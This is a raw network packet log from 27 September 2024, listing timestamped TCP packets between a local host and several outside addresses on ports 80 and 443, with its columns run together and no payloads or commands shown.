                                                                                    Sep 27, 2024 00:15:13.434485912 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.434495926 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.434506893 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.434519053 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.434526920 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.434526920 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.434537888 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.434550047 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.434562922 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.434602976 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.438291073 CEST44349773172.67.162.108192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.438400984 CEST44349773172.67.162.108192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.438477039 CEST49773443192.168.2.4172.67.162.108
                                                                                    Sep 27, 2024 00:15:13.440134048 CEST49773443192.168.2.4172.67.162.108
                                                                                    Sep 27, 2024 00:15:13.440148115 CEST44349773172.67.162.108192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.440165043 CEST49773443192.168.2.4172.67.162.108
                                                                                    Sep 27, 2024 00:15:13.440171003 CEST44349773172.67.162.108192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.440391064 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.440403938 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.440414906 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.440480947 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.462789059 CEST49776443192.168.2.4188.114.96.3
                                                                                    Sep 27, 2024 00:15:13.462831020 CEST44349776188.114.96.3192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.462971926 CEST49776443192.168.2.4188.114.96.3
                                                                                    Sep 27, 2024 00:15:13.463413954 CEST49776443192.168.2.4188.114.96.3
                                                                                    Sep 27, 2024 00:15:13.463427067 CEST44349776188.114.96.3192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.524570942 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.524593115 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.524605036 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.524651051 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.524826050 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.524879932 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.524892092 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.524904013 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.524957895 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.524971008 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.524983883 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.525021076 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.525796890 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.525816917 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.525829077 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.525865078 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.525891066 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.525903940 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.526063919 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.526761055 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.526773930 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.526786089 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.526798964 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.526810884 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.526835918 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.526835918 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.526880026 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.527718067 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.527731895 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.527743101 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.527776003 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.527787924 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.527815104 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.527853012 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.614955902 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.615012884 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.615084887 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.615087986 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.615118980 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.615153074 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.615163088 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.615178108 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.615238905 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.615397930 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.615411043 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.615422964 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.615454912 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.615973949 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.615986109 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.615998983 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.616013050 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.616022110 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.616096973 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.616215944 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.616228104 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.616239071 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.616250992 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.616276026 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.616280079 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.616291046 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.616300106 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.616303921 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.616317034 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.616328001 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.616344929 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.617218018 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.617229939 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.617245913 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.617275953 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.617284060 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.617292881 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.617305040 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.617316961 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.617328882 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.617353916 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.617379904 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.617381096 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.618206024 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.618217945 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.618228912 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.618263960 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.618273020 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.618273020 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.618274927 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.618288040 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.618299961 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.618349075 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.618371010 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.664514065 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.690356016 CEST443497755.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.690540075 CEST49775443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:13.691009045 CEST49775443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:13.691016912 CEST443497755.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.693074942 CEST49775443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:13.693082094 CEST443497755.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.705610037 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.705708981 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.705720901 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.705785036 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.706279039 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.706419945 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.706456900 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.706593037 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.706604004 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.706615925 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.706697941 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.707289934 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.707302094 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.707313061 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.707395077 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.708117008 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.708128929 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.708139896 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.708152056 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.708185911 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.708209991 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.708976030 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.708988905 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.709001064 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.709013939 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.709043980 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.709105968 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.709656000 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.709667921 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.709677935 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.709734917 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.710491896 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.710505009 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.710510015 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.710515976 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.710612059 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.711209059 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.711221933 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.711231947 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.711328983 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.712021112 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.712033987 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.712045908 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.712131977 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.712774038 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.712785959 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.712796926 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.712807894 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.712862968 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.712862968 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.713597059 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.713608980 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.713624001 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.713670969 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.714330912 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.714343071 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.714354038 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.714435101 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.715167046 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.715178967 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.715184927 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.715194941 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.715281010 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.715907097 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.715919971 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.715930939 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.715964079 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.716701031 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.716712952 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.716723919 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.716818094 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.716818094 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.717541933 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.717554092 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.717564106 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.717576981 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.717588902 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.717614889 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.717667103 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.719073057 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.719085932 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.719183922 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.811597109 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.811628103 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.811646938 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.811743975 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.811880112 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.811894894 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.811912060 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.811927080 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.811945915 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.811985970 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.812342882 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.812359095 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.812372923 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.812381029 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.812419891 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.812835932 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.812907934 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.812992096 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.813005924 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.813020945 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.813035965 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.813046932 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.813051939 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.813067913 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.813085079 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.813090086 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.813113928 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.813788891 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.813810110 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.813826084 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.813842058 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.813844919 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.813857079 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.813873053 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.813882113 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.813889980 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.813903093 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.813906908 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.813946962 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.814821959 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.814837933 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.814852953 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.814867973 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.814877033 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.814883947 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.814896107 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.814903021 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.814927101 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.814932108 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.814980030 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.815713882 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.815731049 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.815745115 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.815761089 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.815776110 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.815778971 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.815825939 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.816318035 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.816332102 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.816358089 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.816373110 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.816380978 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.816390038 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.816395998 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.816406965 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.816422939 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.816436052 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.816467047 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.817282915 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.817298889 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.817313910 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.817328930 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.817342997 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.817358017 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.817368031 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.817373991 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.817378044 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.817390919 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.817404985 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.817475080 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.818244934 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.818260908 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.818275928 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.818290949 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.818305016 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.818321943 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.818336964 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.818337917 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.818351984 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.818356991 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.818408966 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.819251060 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.819267035 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.819282055 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.819297075 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.819313049 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.819320917 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.819328070 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.819338083 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.819344044 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.819360018 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.819366932 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.819394112 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.820209980 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.820225954 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.820240021 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.820255041 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.820270061 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.820283890 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.820286036 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.820302010 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.820319891 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.820343971 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.821211100 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.821224928 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.821239948 CEST8049774147.45.44.104192.168.2.4
